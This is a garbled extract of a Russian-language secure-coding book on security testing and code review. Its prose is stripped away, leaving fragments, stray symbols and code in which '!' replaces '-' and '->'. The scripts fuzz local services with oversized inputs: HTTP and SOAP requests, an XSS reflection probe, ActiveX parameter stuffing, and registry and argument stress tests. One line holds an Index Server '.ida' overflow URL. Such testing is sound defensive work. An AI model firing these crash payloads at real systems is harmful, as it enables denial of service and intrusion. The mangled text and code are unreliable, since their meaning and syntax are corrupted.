my $junk = join ("", @chars[ map{rand @chars } (1 .. $s ize)]);
C C++ CryptGenRandom,
( ,
, 8). CryptGen
Random (. Secure
co2\Chapter19\PrintableRand).
/*
PrintableRand.cpp
*/
#include "wincrypt.h"
DWORD CreateRandomData(LPBYTE lpBuff, DWORD cbBuff, BOOL fPrintable) {
DWORD dwErr = 0;
if (CryptAcquireContext(&hProv, NULL, NULL,
PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT) == FALSE)
ZeroMemory(lpBuff, cbBuff);
if (CryptGenRandom(hProv, cbBuff, lpBuff)) {
if (fPrintable) {
char *szValid="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789"
"~`!@#$%^&*()_! +={}[];:'<>,.?|\\/";
DWORD cbValid = lstrlen(szValid);
// (0! 255)
// .
// , strlen(szValid)
19
503
// 255.
for (DWORD i=0; i<cbBuff; i++)
lpBuff[i] = szValid[lpBuff[i] % cbValid];
// .
// , .
lpBuff[cbBuff!1] = '\0';
}
} else {
}
if (hProv != NULL)
return dwErr;
}
void main(void) {
BYTE bBuff[16];
if (CreateRandomData(bBuff, sizeof bBuff, FALSE) == 0) {
// ! !
}
}
,
,
. : ,
.
. Perl ,
.
#
# '_' $MAX.
# .
# ! 128_000 128 000.
# , ?
my $MAX = 128_000;
for (my $i=1; $i < $MAX; $i *= 2) {
my $junk = 'A' x $i;
# $junk .
}
! ,
. ,
, .

(Barton P. Miller) Fuzz Revisited: A Reexamination of the Reliability
504
IV
of UNIX Utilities and Services* (http://citeseer.nj.nec.com/2176.html),

, .
:
, ,
1990 ., ,
1995 . ,
UNIX (
Sun, IBM, SGI, DEC NEXT) 1543 %.
,
, . ,
;
,
.
,
. .

, ,
, .
:
(Cs);
(Ct);
Null (Cn);
(Cz);
(Co);
(Cv).
(Cs) (Ct) .
, 0 0. [
. 0, , 0,
, (Ct).] Null , ;
.
.
: 09
092002, 09092002Jk17&61hhAn=_9jAMh.
.
,
, . , Web
, () , TIMESTAMP,
, ,
.
TIMESTAMP,
.
:
UNIX. . .
19
505
, ,
. , :
TIMESTAMP:
H7ahbsk (0kaaR
(
) , ,
:
TIMESTAMP:
09871662
RPC,
/robust MIDL (Microsoft Interface Definition Language).
RPC,
.
. RPC
,
, MIDL.
MIDL /robust
. , RPC
,
. RPC .

.
: , 1777,
, C++ :
#define MAX_BLOB (128)

typedef enum {
ACTION_QUERY,
ACTION_GET_LAST_TIME,
ACTION_SYNC
} ACTION;
typedef struct {
ACTION actAction;
short cbBlobSize;
char bBlob[MAX_BLOB];
} ACTION_BLOB;
// 2
// 2
// 128
, actAction 0, 1 2,
ACTION_QUERY, ACTION_GET_LAST_TIME
ACTION_SYNC, ,
, 132
. ,
actAction
, cbBlobSize bBlob . Perl
(. Secureco\Chapter19).
506
IV
# PackedStructure.pl
# TCP
# , 1777;
# ;
# MAX_BLOB, 'A'.
use IO::Socket;
my $MAX_BLOB = 128;
my $actAction = 0; # ACTION_QUERY
my $bBlob = 'A' x $MAX_BLOB;
my $cbBlobSize = 128;
my $server = '127.0.0.1';
my $port = 1777;
if ($socks = IO::Socket::INET!>new(Proto=>"tcp",
PeerAddr=>$server,
PeerPort => $port,
TimeOut => 5)) {
my $junk = pack "ssa128",$actAction,$cbBlobSize,$bB lob;
printf " $port (%d bytes)", length $ junk;
$socks!>send($junk);
}
Perl
ActiveState Visual Perl 1.0 http://www.acti
vestate.com.
pack. Perl
,
. ssa128,
( s) 128
(a128). pack ,
Unicode UTF8, (little endian) (big endian)
. .
pack Perl
,
.
,
XML (. 192 193).
, . ,
.

(Ll).
, ,
.
19
507
(Cl:Ll)
(Ol)
(Oa)
(Oa)
(Cs Co)
(Cl:Lz)
OnHand.xml
(Cl:Lz)

(Cr)
<?xml version="1.0" encoding="utf!8"?>

<items>
<item name ="Foo readonly="true">
<cost>13.50</cost>
<lastpurch>20020903</lastpurch>
<fullname>Big Foo Thing</fullname>
</item>
</items>
(Cpe)
(Cr)
. 192. XML,

OnHand.xml

(Cl:Lz)
(Cr)
. 193.
(Cl:Lz)
(Cr)
(Cl:Ll)
(Cl:Ll)
(Cl:Lz)
(Cp)
<?xml version="1.0" ?>

<items>
<item name ="Foo"readonly="true">
<cost>13.50</cost>
<lastpurch>20020903</lastpurch>
<fullname>Big Foo Thing</fullname>
</item>
<lastpurch> (Cl:Lz)
(Co)
</items>
, (Cw)
(Co)
(Co)
(Co)
(Cl:Ll)
, (Cv)
XML

Perl : ,
.
; ,
, , .
, ? (,

20.) :
my $cbBlobSize = 256;
# .
508
IV
256 .
128 , MAX_BLOB
(128) .
256 128 , 256
. 256
256 . , ,
, 128 .
, , ,
. ,
, , DoS.
my $cbBlobSize = 256_000;
# .
,
.
, .
: +
, ,
,
.
,
. :
.
15 .
, EIP.
( A),
, , ,
.
EIP
A B, ,
B, .
B
EIP, .
EIP , .
, ,
MAX_PATH,
. MAX_PATH
Windows 260.
, Unicode ANSI
, ANSI
, Unicode, .
19
509

, ,
, [ , (Cpq)
(Cpm)]
[, (Cpe)].
. 194.
19-4.
// /* */
C++, C# C
Perl
Visual Basic
<! >
HTML XML

SQL
;:
\n \r 0x0a 0x0d
\t
0x04
0x7f
0x00
<>
*?

, :
(Nr), (No)
(Nh).
. ( )

, ,
, . ,
cookie
, ,
, , (replay) ,
,
.

. , Data1, Data2 Data3,
: Data1, Data3
Data2. ,
Data1, Data2 Data3 .
.
:

510
IV

.
.
Perl ,
, C/C++, .NET
.
?
,
, !
: ,
.
. 17
, .

, ,
Hailstorm Cenzic.
,
(flooding) .
http:// www.cenzic.com.

.
, .
Performance Monitor ()
.
, ,

.
, Gflags.exe (
Windows 2000 Windows .NET)
, ; Oh.exe
; dh.exe
.
Windows 2000 Windows .NET.
! ,
. ?
,
. ,
.
19
511

, .
.
.

.
: , , ,
. , ,
,
. , Visual Basic
COM,
.
.

exploit, . ,
,
, .
:
. Sendmail,
(pipe bomb),
AIX 10.0 IBM,
.
,
, ,
!

.

. ,
, ,
. . ,
,
.

Perl,
. Perl
,
pack. ,
C++,
C++.
,
512
IV
. MFC CSocket. C# Visual Basic .NET

. C# System.
Net.Sockets , ,
. , TcpClient
TcpServer .
HTTP-
Perl .NET Framework. :
, HTTP .
Perl C#, ,
, HTTP.
Perl (. Secureco2\Chapter19), HTTP
. Name, Address Zip
. Timestamp,
.
# SmackPOST.pl
use LWP::UserAgent;
# !.
my $ua = LWP::UserAgent!>new();
$ua!>agent("HackZilla/v42.42 WindowsXP");
# .
my $url = "http://127.0.0.1/form.asp";
my $req = POST $url, [Name => 'A' x 128,
Address => 'B' x 256,
Zip => 'C' x 128];
$req!>push_header("Timestamp:" => '1' x 10);
my $res = $ua!>request($req);
# .
# $err HTTP,
# $_ holds HTTP!.
my $err = $res!>status_line;
$_ = $res!>as_string;
print " !" if (/Illegal Operation/ ig || $err != 200);
, ,
Perl, LWP
WWW Perl (Library for WWW) HTTP,
.
(. Secureco2\Chapter19).
ISAPI test.dll, GET.
URL
(bogushdr), , H
256 , + ,
, 128 .
19
513
# SmackQueryString.pl
use LWP::UserAgent;
$bogushdr = ('H' x 256) . '\n\r';
$hdr = new HTTP::Headers(Accept => 'text/plain',
User!Agent => 'HackZilla/ 42.42',
Test! Header => $bogushdr x 128);
$urlbase = 'http://localhost/test.dll?data=';
$data = 'A' x 16_384;
$url = new URI::URL($urlbase . $data);
$req = new HTTP::Request(GET, $url, $hdr);
$ua = new LWP::UserAgent;
$resp = $ua!>request($req);
if ($resp!>is_success) {
print $resp!>content;
}
else {
print $resp!>message;
}
.NET Framework
WebClient, HttpGetClientProtocol HttpPostClientProtocol.
HTTP::Request::Common Perl,
. C# ,
WebClient ,
.
using System;
using System.Net;
using System.Text;
namespace NastyWebClient {
class NastyWebClientClass {
if (args.Length < 1) return;
string uri = args[0];
WebClient client = new WebClient();
client.Credentials = CredentialCache.DefaultCredentials;
client.Headers.Add
(@"IWonderIfThisWillCrash:" + new String('a',32000));
client.Headers.Add
(@"User!agent: HackZilla/v42.42 WindowsXP");
try {
//
514
IV
byte[] data = client.DownloadData(uri);

WebHeaderCollection header = client.ResponseHeaders;
bool isText = false;
for (int i=0; i < header.Count; i++) {
string headerHttp = header.GetKey(i);
string headerHttpData = header.Get(i);
Console.WriteLine
(headerHttp + ":" + headerHttpData);
if (headerHttp.ToLower().StartsWith
("content!type") &&
headerHttpData.ToLower().StartsWith("text"))
isText = true;
}
// ,
if (isText) {
string download = Encoding.ASCII.GetString(data);
Console.WriteLine(download);
}
} catch (WebException e) {
Console.WriteLine(e.ToString());
}
}
}
}
Microsoft Index Server 2.0,
CodeRed Unchecked
Buffer in Index Server ISAPI Extension Could Enable Web Server Compromise (
ISAPI Index Server
Web) Web http://www.microsoft.com/technet/
security/bulletin/MS01033.asp, ,
. URL
Index Server,
. A.
$url = 'http://localhost/nosuchfile.ida?' . ('A' x 260) . '=X';

Perl Win32::Pipe, ,
, C++
. C++,
ACL .
.
.
COM, DCOM, ActiveX RPC

,
, , ,
COM, DCOM, ActiveX, RPC.
19
515
,
, IDL (Interface Definition Language).
RPC /robust (
16),
RPC ,
RPC DCOM ,
IDL.
RPC, Microsoft!
, ,
C++. , ,
RPC. , . 191.
RPC DCOM ( ,
C++, )
,

, ,
, .
Automation, COM
IDispatch, C++

.
, ActiveX ,
ActiveX Web,
, . ActiveX
, ,
?
ActiveX- <OBJECT>
ActiveX, <OBJECT>,
, ActiveX. ,
HTML,
. ActiveX,
<OBJECT>.
, .
ActiveX
System Monitor, Sysmon.ocx ( CLASSID
C4D2D8E0D1DD11CE940F008029004347).
LogFileName. ,
2000 , .
,
. , .
<HTML>
<BODY>
<OBJECT ID="DISysMon" WIDTH="100%" HEIGHT="100%"
CLASSID="CLSID:C4D2D8E0!D1DD!11CE!940F!008029004347">
<PARAM NAME="_Version" VALUE="195000">
<PARAM NAME="_ExtentX" VALUE="21000">
516
IV
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
<PARAM
NAME="_ExtentY" VALUE="16000">
NAME="AmbientFont" VALUE="1">
NAME="Appearance" VALUE="0">
NAME="BackColor" VALUE="0">
NAME="BackColorCtl" VALUE="!2147483633">
NAME="BorderStyle" VALUE="1">
NAME="CounterCount" VALUE="0">
NAME="DisplayType" VALUE="3">
NAME="ForeColor" VALUE="!1">
NAME="GraphTitle" VALUE="Test">
NAME="GridColor" VALUE="8421504">
NAME="Highlight" VALUE="0">
NAME="LegendColumnWidths"
VALUE="!11 !12 !14 !12 !13 !13 !16">
<PARAM NAME="LegendSortColumn" VALUE="0">
<PARAM NAME="LegendSortDirection" VALUE="2097272">
<PARAM NAME="LogFileName" VALUE="aaaaaa...aaaaaaa"> // 2000 'a'
<PARAM NAME="LogViewStart" VALUE="">
<PARAM NAME="LogViewStop" VALUE="">
<PARAM NAME="ManualUpdate" VALUE="0">
<PARAM NAME="MaximumSamples" VALUE="100">
<PARAM NAME="MaximumScale" VALUE="100">
<PARAM NAME="MinimumScale" VALUE="0">
<PARAM NAME="MonitorDuplicateInstances" VALUE="1">
<PARAM NAME="ReadOnly" VALUE="0">
<PARAM NAME="ReportValueType" VALUE="4">
<PARAM NAME="SampleCount" VALUE="0">
<PARAM NAME="ShowHorizontalGrid" VALUE="1">
<PARAM NAME="ShowLegend" VALUE="1">
<PARAM NAME="ShowScaleLabels" VALUE="1">
<PARAM NAME="ShowToolbar" VALUE="1">
<PARAM NAME="ShowValueBar" VALUE="1">
<PARAM NAME="ShowVerticalGrid" VALUE="1">
<PARAM NAME="TimeBarColor" VALUE="255">
<PARAM NAME="UpdateInterval" VALUE="1">
<PARAM NAME="YAxisLabel" VALUE="Test">
</OBJECT>
</BODY>
</HTML>

( <PARAM NAME>) ,
HTML, HTML,
, HTML,
HTML, , ActiveX
. C# , HTML
.
using System;
using System.Text;
using System.IO;
19
namespace WhackObject {
class Class1 {
static Random _rand;
static int getNum() {
return _rand.Next(!1000,1000);
}
static string getString() {
StringBuilder s = new StringBuilder();
for (int i = 0; i < _rand.Next(1,16000); i++)
s.Append("A");
return s.ToString();
}
_rand = new Random(unchecked((int)DateTime.Now.Ticks));
string CRLF = "\r\n";
try {
string htmlFile = "test.html";
string prolog =
@"<HTML><BODY><OBJECT ID='DISysMon' WIDTH='100%' HEIGHT='100%'" +
"CLASSID='CLSID:C4D2D8E0!D1DD!11CE!940F!008029004347'>";
string epilog = @"</OBJECT></BODY></HTML>";
StreamWriter sw = new StreamWriter(htmlFile);
sw.Write(prolog + CRLF);
string [] numericArgs = {
"ForeColor","SampleCount",
"TimeBarColor","ReadOnly"};
string [] stringArgs = {
"LogFileName","YAxisLabel","XAxisLabel"};
for (int i=0; i < numericArgs.Length; i++)
sw.Write(@"<PARAM NAME={0} VALUE={1}>{2}",
numericArgs[i],getNum(),CRLF);
for (int j=0; j < stringArgs.Length; j++)
sw.Write(@"<PARAM NAME={0} VALUE={1}>{2}",
stringArgs[j],getString(),CRLF);
sw.Write(epilog + CRLF);
sw.Flush();
sw.Close();
} catch (IOException e){
Console.Write(e.ToString());
}
517
518
IV
}
}
}
, ,
.
.
<PARAM>, , (
,
).
Microsoft Internet Explorer,
;
.
,
,
. ,
, . 191.
, , ACL
. ,
, .
Perl File.txt,
Process.exe. :
0 32 000 A.
my $FILE = "file.txt";
my $exe = "program.exe";
my @sizes = (0,256,512,1024,2048,32000);
foreach(@sizes) {
printf "Trying $_ bytes\n";
open FILE, "> $FILE" or die "$!\n";
print FILE 'A' x $_;
close FILE;
# system().
'$exe $FILE';
}
, ,
FileMon (http://www.sysinternals.com).
,
Holodeck Canned Heat,
(Center for Software Engineering Research)
(Florida Institute of Technology).
http://se.fit.edu/projects.
(James A. Whittaker) How to Break Software: A Practical Guide
to Testing ( :
) (. ).
19
519
,
, Perl Win32::Registry.
.
, 1000 ,
, .
use Win32::Registry;
my $reg;
$::HKEY_LOCAL_MACHINE!>Create("SOFTWARE\\AdvWorks\\1.0\\Config",$reg)
or die "$Ê";
my $type = 1; # string
my $value = 'A' x 1000;
$reg!>SetValueEx("SomeData","",$type,$value);
$reg!>Close();
'process.exe';
VBScript :
Set oShell = WScript.CreateObject("WScript.Shell")

strReg = "HKEY_LOCAL_MACHINE\SOFTWARE\AdvWorks\1.0\Config\NumericData"
oShell.RegWrite strReg, 32000, "REG_DWORD"
' process.exe, 1 .
' True : .
iRet = oShell.Run("process.exe", 1, True)
WScript.Echo "process.exe returned " & iRet
. ,
,
RegMon (http://www.sysinternals.com).
! ,
NTFS, ACL
.
ACL:
. ,
, , ,
, .

Perl ,
.
, .
my $arg= 'A' x 1000;

'process.exe !p $args';
$? >>= 8;
print "process.exe $?";
520
IV
,
.
, $?, .
,
$? >>8, $?.
(. Secureco2\Chapter19)
, ,
. ,
,
.
# ExerciseArgs.pl
# .
my $exe = "process.exe";
my $iterations = 100;
#
my $NUMERIC = 0;
my $ALPHANUM = 1;
my $PATH = 2;
#
# /p ! , /i ! /n !.
my %opts = (
p => $PATH,
i => $NUMERIC,
n => $ALPHANUM);
# .
for (my $i = 0; $i < $iterations; $i++) {
print "Iteration $i";
# ?
my $numargs = 1 + int rand scalar %opts;
print " ($numargs args) ";
# .
my @opts2 = ();
foreach (keys %opts) {
push @opts2, $_;
}
# .
my $args = "";
for (my $j = 0; $j < $numargs; $j++) {
my $whicharg = @opts2[int rand scalar @opts2];
my $type = $opts{$whicharg};
my $arg = "";
19
521
$arg = getTestNumeric() if $type == $NUMERIC;

$arg = getTestAlphaNum() if $type == $ALPHANUM;
$arg = getTestPath() if $type == $PATH;
# : /<>:<>
# : /n:test /n:42
$args = $args . " /" . $whicharg . ":$arg";
}
# .
'$exe $args';
$? >>= 8;
printf "$exe $?\n";
}
#
# ;
# 10% .
# 32000 32000.
sub getTestNumeric {
return rand > .9
? 0
: (int rand 32000) ! (int rand 32000);
}
# .
sub getTestAlphaNum {
return 'A' x rand 32000;
}
# .
sub getTestPath {
my $path="c:\\";
for (my $i = 0; $i < rand 10; $i++) {
my $seg = 'a' x rand 24;
$path = $path . $seg . "\\";
}
return $path;
}
Windows
,
.
. UNIX Linux
, root
,
, SUID (set user ID).
522
IV
,
root, .
Solaris 2.5, 2.6, 7 8,
Sun Microsystems. setuid root
Whodo ,
root Sun (http://www.sec
urityfocus.com/bid/2935).
XML
, XML,
, XML.
. 191, XML,
,
. XML:
. ,
.
Perl,
.NET Framework Microsoft XML DOM (XML Document Object Model).
(. Secureco2\Chapter19)
XML JScript HTML. HTML,
XML.
<!!! BuildXML.html !!>

<XML ID="template">
<user>
<name/>
<title/>
<age/>
</user>
</XML>
<SCRIPT>
// ,
//
// .
function createBigString(str, len) {
var str2 = new String();
for (var i = 0; i < len; i++)
str2 += str;
return str2;
}
var user = template.XMLDocument.documentElement;
user.childNodes.item(0).text = createBigString("A", 256);
user.childNodes.item(1).text = createBigString("B", 128);
user.childNodes.item(2).text = Math.round(Math.random() * 1000);
19
523
var oFS = new ActiveXObject("Scripting.FileSystemObject");

var oFile = oFS.CreateTextFile("c:\\temp\\user.xml");
oFile.WriteLine(user.xml);
oFile.Close();
</SCRIPT>
XML, ,
, .
XML, .
XML Web,
XMLHTTP. XML
, Web :
var oHTTP = new ActiveXObject("Microsoft.XMLHTTP");

oHTTP.Open("POST", "http://localhost/ PostData.htm", false);
oHTTP.send(user.XMLDocument);
XML .NET Framework .
C# XML .
, getBogusISBN getBogusDate
!

string file = @"c:\1.xml";
XmlTextWriter x = new XmlTextWriter(file, Encoding.ASCII);
Build(ref x);
// ! XML!.
}
static void Build(ref XmlTextWriter x) {
x.Indentation = 2;
x.Formatting = Formatting.Indented;
x.WriteStartDocument(true);
x.WriteStartElement("books", "");
for (int i = 0; i < new Random.Next(1000); i++) {
string s = new String('a', new Random().Next(10000));
x.WriteStartElement("book", "");
x.WriteAttributeString("isbn", getBogusISBN());
x.WriteElementString("title", "", s);
x.WriteElementString("pubdate", "", getBogusDate());
x.WriteElementString("pages", "", s);
x.WriteEndElement();
}
x.WriteEndElement();
x.WriteEndDocument();
x.Close();
}
524
IV
, XML
, XML .
, , ,
XML ,
! http://www.com
puterworld.com/rckey259/story/0,1199,NAV63_STO61979,00.html.
SOAP-
, SOAP , XML HTTP,
SOAP , XML HTTP! Perl (
Secureco2\Chapter19) , SOAP
SOAP.
SOAP
, SMTP , HTTP
.
# TestSoap.pl
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
$ua!>agent("SOAPWhack/1.0");
my $url = 'http://localhost/MySOAPHandler.dll';
my $iterations = 10;
# coinToss
my $HEADS = 0;
my $TAILS = 1;
open LOGFILE, ">>SOAPWhack.log" or die $!;
# SOAP
# , , ""!
my @soapActions=('','junk','foo.sdl');
for (my $i = 1; $i <= $iterations; $i++) {
print "SOAPWhack: $i of $iterations\r";
# .
my $soapAction = $soapActions[int rand scalar @soapActions];
$soapAction = 'S' x int rand 256 if $soapAction eq 'junk';
my
my
my
my
$soapNamespace = "http://schemas.xmlsoap.org/soap/envelope/";
$schemaInstance = "http://www.w3.org/2001/XMLSchema!instance";
$xsd = "http://www.w3.org/XMLSchema";
$soapEncoding = "http://schemas.xmlsoap.org/soap/encoding/";
19
525
my $spaces = coinToss() == $HEADS ? ' ' : ' ' x int rand 16384;
my $crlf = coinToss() == $HEADS ? '\n' : '\n' x int rand 256;
# SOAP!.
my $soapRequest = POST $url;
$soapRequest! >push_header("SOAPAction" => $soapAction);
$soapRequest!>content_type('text/xml');
$soapRequest!>content("<soap:Envelope " . $spaces .
" xmlns:soap=\"" . $soapNamespace .
"\" xmlns:xsi=\"" . $schemaInstance .
"\" xmlns:xsd=\"" . $xsd .
"\" xmlns:soapenc=\"" . $soapEncoding .
"\"><soap:Body>" . $crlf .
"</soap:Body></soap:Envelope>");
# .
my $soapResponse = $ua!>request($soapRequest);
# .
print LOGFILE "[SOAP Request]";
print LOGFILE $soapRequest!>as_string . "\n";
print LOGFILE "[WSDL response]";
print LOGFILE $soapResponse!>status_line . " ";
print LOGFILE $soapResponse!>as_string . "\n";
}
close LOGFILE;
sub coinToss {
return rand 10 > 5 ? $HEADS : $TAILS;
}
,
.
,
SoapHttpClientProtocol .NET Framework.

-
13 (cross
site scripting, XSS) , .
, Web
. , ,
,
13 .
XSS :
, .
526
IV
XSS
http://www.owasp.org.
, XSS
, , : Web
. Web
, ( cookie) .
. ,
HTTP, .
, , XSS
.
13. :
, XSS, ,
. , ,
<>&gt, , , Web
XSS.
.

[ (Cpm)] Web
.
Perl
. ,
, ,
XSS. : ,
XSS . ,
. XSS ,
. .
# CSSInject.pl
use LWP::UserAgent;
my $url = "http://127.0.0.1/test.asp";
my $css = "xyzzy";
$_ = buildAndSendRequest($url,$css);
# , .
if (index(lc $_, lc $css) != !1) {
print "Possible XSS issue in $url\n";
#
my $css = "<>>";
$_ = buildAndSendRequest($url,$css);
if (index(lc $_, lc $css) != !1) {
print ", XSS! $url\n";
} else {
19
527
print ", ! XSS! $url\n";

}
}
sub buildAndSendRequest {
my ($url, $css) = @_;
# .
# .
$ua!>agent("CSSInject/v1.42 WindowsXP");
my $req = POST $url, [Name => $css,
Address => $css,
Zip => $css];
my $res = $ua!>request($req);
return $res!>as_string;
}
, Malicious HTML
Tags Embedded in Client Web Requests ( HTML,
Web) http://www.cert.org/advisories/CA
200002.html, .

.

. ,
.
!
,
. : ,
. (.
Secureco2\Chapter19), 80
, .
, ,
.
# TCPJunkServer.pl
use IO::Socket;
my $port = 80;
my $server = IO::Socket::INET!>new(LocalPort => $port,
Type => SOCK_STREAM,
528
IV
Reuse => 1,
Listen => 100)
or die " $port: $@\n";
while ($client = $server!>accept()) {
my $peerip = $client!>peerhost();
my $peerport = $client!>peerport();
my $size = int rand 16384;
my @chars = ('A'..'Z', 'a'..'z', 0..9,
qw( ! @ # $ % ^ & * ! + = ));
my $junk = join ("", @chars[ map{rand @chars } (1 . . $size)]);
print " $peerip:$peerport, ";
print " $size .\n";
$client!>send($junk);
}
close($server);
/

. ,
? ,
,
. , ,
, , .
!
( )
RunAs ,
.
, .
,
, .

. : ,
!
, Available for Registry Permissions Vulne
rability (http://www.microsoft.com/technet/security/bulletin/MS00095.asp) Offload
ModExpo Registry Permissions Vulnerability (http://www.microsoft.com/technet/security/
bulletin/MS00024.asp), ,
.
19
529

Windows 2000
,
. , .

;
. ,
, ,
.
! ,
.
:
,
. , ,
, ,
.
. 195 , Windows 2000
.
19-5.
Windows 2000
compatws

Users (),
. ,
ACL
NTFS. ACL
Users ,
Power Users ( )
hisecdc
,
ACL NTFS.
securedc (. )
Windows 2000 .
Power Users ( )
hisecws

securews. ACL
Power User Terminal Server Users (
) Power
Users ( )
rootsec
ACL

securedc
, ,
ACL NTFS
securews
, ,
ACL
NTFS. Power Users
( )
530
IV
,
securews, , securedc,
.
:
secedit /configure /cfg securews.inf /db securews.sdb /overwrite

,
, , . ,
7,
.
, hisecdc
hisecws ,
hisecdc hisecws. SMB
(Server Message Block).
SMB, SMB .
!
, . ,
?
. .
. .
IP ( 172.100.84.22),
, ,
( aaaaaaaaaaaaaaaaaaaa.100.84.22). ,
. ,
, :
aaaaaaaaaaaaaaaaaaaa.100.84.22
172.aaaaaaaaaaaaaaaaaaaa.84.22
172.100.aaaaaaaaaaaaaaaaaaaa.22
172.100.84.aaaaaaaaaaaaaaaaaaaa
.
1. .
?
exploit. IP
, .
IP.
2. exploit. ,
, .
. IP.
3. .
,
. , exploit,
.
19
531
.
,
.
,
. exploit
, ,
.
, .

. 191.
4. .
,
,
. ,

. .
: ,
. ,

. , ,

. ,
,
, .
, ,
.
, ,
,
, .

,
,
.
, .
,
.
,
!
532
IV

, . ,
. , :
A , B? ,
, . , ,
. .
1. .
2. .
3. .

(relative attack surface quotient, RASQ).
.

. ,
, Windows
ACL, Linux UNIX setuid,
root,
. ,
.
!

,
. ,
, ACL
, .
.

,
, RASQ. Win
dows (. 196).
19-6.
Windows
1,0
ISAPI
RPC
0,9
Web
1,0
0,6
0,8
1,0
0,4
0,7
0,8
0,9
533
19
19-6.
()
,
SYSTEM
0,9
0,9
Web
1,0

(Guest)
0,9
ACL

0,7
ACL
0,4
ACL
0,9
Windows
. 194.
400
350
300
250
200
150
100
50
0
Windows 2000
Windows .NET
Server
Windows .NET
Server
IIS
Windows XP
Windows XP

ICF
. 194.
Windows
,
, (
). , Linux OS/400
.
,
.
RASQ:
.
, RASQ, , 5%.
,
(function point analysis) .
, .
534
IV
.
, ,
, .
,
, ,
; STRIDE
.

.
.
,
. ,

.
20

,
, ,
.

. , , , ,
.
(, telnet
.) , ,
, .
,
. ,
.
, . (Jack Ganssle)
A Guide to Code Inspections ( ) (http://
www.ganssle.com/Inspections.pdf) ,
. ,
, .

,
. ,
, : ,
9 , ,
. 2030
, .
?
(reviewer) : (moderator),
(reader), (recorder) (author).
536
IV
.
.
, :
, , .
,
.
, .
, ,
. , ,
,
. , ,
,
. , , ,
. , :
,
.

,
. , RPC,
,
RPC. .
, .
, :
,
, . ,
, ,
, , .
, ,
API. : ,
, ,
.
,
.
? ?
?
, ,
.
. ,
, ,
, . ,
?
, ?
?
20
537

, .

. .

,
. 250 000 ,
. , ,
.
, , .
,
. , ,
.
. ,
,
,
. ,
.
,
. ,
, .
,
.
,
.
, .
, (
)
. ,
. ,
,
. ,
.
, . ,
1200 ,
, , ?
Windows Security Push 2002 ,
,
, .
: ,
.
; ,
538
IV

.

Microsoft
.
: , .
.
, ,
. ,
. , ,
: ?
, .
! , ,
, : ,
,
,
.
,
. ,
, .
.
, ,
.
, , , ,
.

,
.
, .
, ( 5)
strncpy, strcpy. , ,
NULL,
.
;
.
,
strncpy, strncat snprintf
. ,
. ,
.
20
539
;
.
, . ,
5 ,
. ,
, ,
exploit.

, .

DoS. _alloca

,
. , , _alloca,
.
Unicode ANSI,
.
WideCharToMultiByte:
int WideCharToMultiByte(
UINT CodePage,
DWORD dwFlags,
LPCWSTR lpWideCharStr,
int cchWideChar,
LPSTR lpMultiByteStr,
int cbMultiByte,
LPCSTR lpDefaultChar,
LPBOOL lpUsedDefaultChar
//
//
//
//
//
//
//
//
//
//

""

,

);
(Unicode)
, . MultiByteToWideChar
. ,
, ,
ANSI. API,
( ), DCOM
IIS C++. ,
, , ,
. , (
) ,
.
TCHAR.
char, WCHAR #define
UNICODE . ,
.
, .
540
IV

. ,
,
.

.
.
, .
int Example(char* str, int size)

{
char buf[80];
if(size < sizeof(buf))
{
// ...
strcpy(buf, str);
}
}
: ? , ? ,
: . sizeof
size_t.
size? , sizeof(buf)
,
. ,
, .
,
. ,
, .

. ,
,
, !
MAX_INT.
,
, , ,
:
if(result < original)

{
//!
return false;
}
GetTickCount
. GetTickCount 40 ,
.
20
541

. :
typedef struct _LSA_UNICODE_STRING {

USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} LSA_UNICODE_STRING;
Length MaximumLength ,
, 32 768 Unicode.
, WCHAR
:
void InitLsaUnicodeString(const WCHAR* str,

LSA_UNICODE_STR* pUnicodeStr)
{
if(str == NULL)
{
pUnicodeStr!>Buffer = NULL;
pUnicodeStr!>Length = 0;
pUnicodeStr!>MaximumLength = 0;
}
else
{
unsigned short len =
(unsigned short)wcslen(str) * sizeof(WCHAR);
pUnicodeStr!>Buffer = str;
pUnicodeStr!>Length = len;
pUnicodeStr!>MaximumLength = len;
}
}
; , ,
32 769 . , (calc.exe)
. 2.
, , 0x10002.
unsigned short, , Length 2!
, , ,
LSA_UNICODE_STRING ! , Length
MaximumLength , wcscpy!
(truncating) .
:
unsigned long len = wcslen(str) * sizeof(WCHAR);

if(len > 0xffff)
{
pUnicodeStr!>Buffer = NULL;
pUnicodeStr!>Length = 0;
542
IV
pUnicodeStr!>MaximumLength = 0;
}
:
, . :
int AllocateStructs(void** ppMem,

unsigned short StructSize,
unsigned short Count)
{
unsigned short bytes_req;
bytes_req = StructSize * Count;
*ppMem = malloc(bytes_req);
if(*ppMem == NULL)
return !1;
else
return 0;
}
LSA_UNICODE_STRING, ,
, ,

. bytes_req unsigned integer
. :
int AllocateStructs(void** ppMem,

unsigned short StructSize,
unsigned short Count)
{
unsigned short bytes_req;
if(StructSize == 0 || Count > 0xffff/StructSize)
{
assert(false);
return !1;
}
bytes_req = StructSize * Count;
*ppMem = malloc(bytes_req);
if(*ppMem == NULL)
return !1;
else
return 0;
}
,
,
. ,
20
543
. ,
, ,
.
:
, .
,
.
, . ,
, .
,
.
:
, :
void AllocMemory(size_t cbAllocSize)

{
// '\0'
cbAllocSize!!;
char *szData = malloc(cbAllocSize);
...
}
, ,
cbAllocSize == 0! :
:
szDATA != NULL
cbAllocSize 1! (
) highend 1 4 000 000 000.
: , .

,
, : ,
. , ,
.
strncpy, , (. 5).
,
, , , Imperso
nateNamedPipeClient. ,
,
.
:
while(bytes = recv(sock, buf, len, 0))

WriteFile(hFile, buf, bytes, &written, NULL);
544
IV
? recv 0,
TCP.
. , bytes
1 WriteFile
, hFile.
( 64
).
, ,
, .
AdjustTokenPrivileges. :
,
. ,
, GetLastError, ,
, :
ERROR_SUCCESS
ERROR_NOT_ALL_ASSIGNED

NewState .

. PreviousState

, , ,
, . , TRUE,
GetLastError ,
. . :
,
.

,

. ,
. C++ ,
, .. ,
, .

, ,
, ,
. , ( ,
) , ,
. . ,
,
:
20
545
struct blob
{
DWORD Size;
BYTE* Data;
};
, .
4 . Size,
. , ,
, ,
( ) .
, ,
. (Size)
.

Microsoft Office. ,
, .
,
.
, ,
,
, .

,
. , !
21

,
,
. ,
, ,
DoS,
,
.
,

. ,

.
, . ,

Windows 2000 ( ) Windows NT 4
Security Configuration Editor,
.
